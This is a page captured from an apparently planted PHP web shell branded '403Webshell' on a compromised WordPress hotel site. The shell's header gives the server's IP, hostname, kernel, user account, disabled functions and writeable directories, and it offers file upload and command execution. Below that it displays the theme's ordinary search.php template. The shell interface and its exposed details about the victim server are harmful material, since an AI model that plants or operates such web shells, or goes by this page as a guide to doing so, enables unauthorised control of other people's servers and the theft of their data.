403Webshell
Server IP : 89.108.64.180  /  Your IP : 216.73.217.117
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux 89-108-64-180.cloudvps.regruhosting.ru 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : www-root ( 1010)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/v-tihvin.ru/wp-content/themes/hotelbooking/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www-root/data/www/v-tihvin.ru/wp-content/themes/hotelbooking/search.php
<?php get_header(); ?>

<?php if( function_exists('nicdark_search_content')){ do_action( "nicdark_search_nd" ); }else{ ?>

<!--start section-->
<div class="nicdark_section nicdark_border_bottom_1_solid_grey">

    <!--start nicdark_container-->
    <div class="nicdark_container nicdark_clearfix">

    	<div class="nicdark_grid_12">

    		<div class="nicdark_section nicdark_height_80"></div>

			<h1 class="nicdark_font_size_50 nicdark_font_size_40_all_iphone nicdark_line_height_40_all_iphone"><?php esc_html_e('Search for','hotelbooking'); ?></h1>
			<div class="nicdark_section nicdark_height_10"></div>
			<h4 class="nicdark_text_transform_uppercase nicdark_color_grey  nicdark_second_font">" <?php the_search_query(); ?> "</h4>

    		<div class="nicdark_section nicdark_height_80"></div>

    	</div>

    </div>
    <!--end container-->

</div>
<!--end section-->


<div class="nicdark_section nicdark_height_50"></div>


<!--start section-->
<div class="nicdark_section">

    <!--start nicdark_container-->
    <div class="nicdark_container nicdark_clearfix">

	
		<!--start all posts previews-->
    	<?php if ( is_active_sidebar( 'nicdark_sidebar' ) ) { ?>  
    		<div class="nicdark_grid_8"> 
    	<?php }else{ ?>

    		<div class="nicdark_grid_12">
    	<?php } ?>
    	
    	
    		<?php if(have_posts()) : ?>
				
				<?php while(have_posts()) : the_post(); ?>
					
					
					<!--#post-->
					<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>

						<!--START PREVIEW-->
						<?php if (has_post_thumbnail()): ?>
							<div class="nicdark_section nicdark_image_archive">
								<?php the_post_thumbnail(); ?>
							</div>
						<?php endif ?>

						<div class="nicdark_section ">

							<div class="nicdark_section nicdark_float_left nicdark_padding_30 nicdark_padding_15_responsive nicdark_border_1_solid_grey nicdark_box_sizing_border_box">
								
								<h2>
									<a class="nicdark_color_greydark nicdark_first_font" href="<?php the_permalink(); ?>">
										<?php the_title(); ?>
										<?php if ( has_post_format( 'video' )) { esc_html_e(' - Video','hotelbooking'); } ?>
									</a>
								</h2>
								<div class="nicdark_section nicdark_height_15"></div>
								<div class="nicdark_section nicdark_box_sizing_border_box nicdark_archive_info_post">
									
									<div class="nicdark_float_left nicdark_width_100_percentage_all_iphone nicdark_margin_top_5_all_iphone">
										<p class="nicdark_color_grey nicdark_font_size_13 nicdark_line_height_18 nicdark_second_font">
											<span class="nicdark_color_greydark"><strong><?php esc_html_e('DATE','hotelbooking'); ?></strong></span> : 
											<?php the_time(get_option('date_format')) ?> 
										</p>
									</div>

									<div class="nicdark_float_left nicdark_width_100_percentage_all_iphone nicdark_margin_top_5_all_iphone">
										<p class="nicdark_color_grey nicdark_font_size_13 nicdark_line_height_18 nicdark_second_font">
											<span class="nicdark_margin_left_10 nicdark_margin_left_0_all_iphone nicdark_color_greydark"><strong><?php esc_html_e('AUTHOR','hotelbooking'); ?></strong></span> : 
											<?php the_author_posts_link(); ?>
										</p>
									</div>

									<div class="nicdark_float_left nicdark_width_100_percentage_all_iphone nicdark_margin_top_5_all_iphone">
										<p class="nicdark_color_grey nicdark_font_size_13 nicdark_line_height_18 nicdark_second_font">
											<span class="nicdark_margin_left_10 nicdark_margin_left_0_all_iphone nicdark_archive_info_post_comment nicdark_color_greydark"><strong><?php esc_html_e('COMMENTS','hotelbooking'); ?></strong></span> : 
											<?php comments_number(esc_html__('No Comments','hotelbooking'),esc_html__('One Comment','hotelbooking'),esc_html__( '% Comments','hotelbooking') );?>
										</p>
									</div>

								</div>
								<div class="nicdark_section nicdark_height_20"></div>
								<?php the_excerpt(); ?>
								<div class="nicdark_section nicdark_height_20"></div>
								<a class="nicdark_bg_btn_archive nicdark_display_inline_block nicdark_line_height_16 nicdark_font_size_11 nicdark_text_align_center nicdark_box_sizing_border_box nicdark_letter_spacing_2 nicdark_color_white nicdark_second_font nicdark_padding_15_35 nicdark_bg_orange " href="<?php the_permalink(); ?>"><strong><?php esc_html_e('READ MORE','hotelbooking'); ?></strong></a>

							</div>
						</div>
						<!--END PREVIEW-->

					</div>
					<!--#post-->






					<div class="nicdark_section nicdark_height_50"></div>


						
				<?php endwhile; ?>


			<?php else: ?>
	
	            <p><?php esc_html_e('NOTHING FOUND: Search again','hotelbooking'); ?></p>

			<?php endif; ?>



			<!--START pagination-->
			<div class="nicdark_section">

				<?php

		    	the_posts_pagination( array(
					'prev_text'          => esc_html__( 'Prev', 'hotelbooking' ),
					'next_text'          => esc_html__( 'Next', 'hotelbooking' ),
					'before_page_number' => '<span class="meta-nav screen-reader-text">' . esc_html__( 'Page', 'hotelbooking' ) . ' </span>',
				) );

				?>

				<div class="nicdark_section nicdark_height_50"></div>
			</div>
			<!--END pagination-->


    	</div>
    	<!--end all posts previews-->

    	<!--sidebar-->
    	<?php if ( is_active_sidebar( 'nicdark_sidebar' ) ) { ?>  
    		
	    	<div class="nicdark_grid_4">
	    		<?php if ( ! get_sidebar( 'nicdark_sidebar' ) ) : ?><?php endif ?>
	    		<div class="nicdark_section nicdark_height_50"></div>
	    	</div>
	    	
    	<?php } ?>
    	<!--end sidebar-->

    	
	</div>
	<!--end container-->

</div>
<!--end section-->

<?php } ?>

<?php get_footer(); ?>

Youez - 2016 - github.com/yon3zu
LinuXploit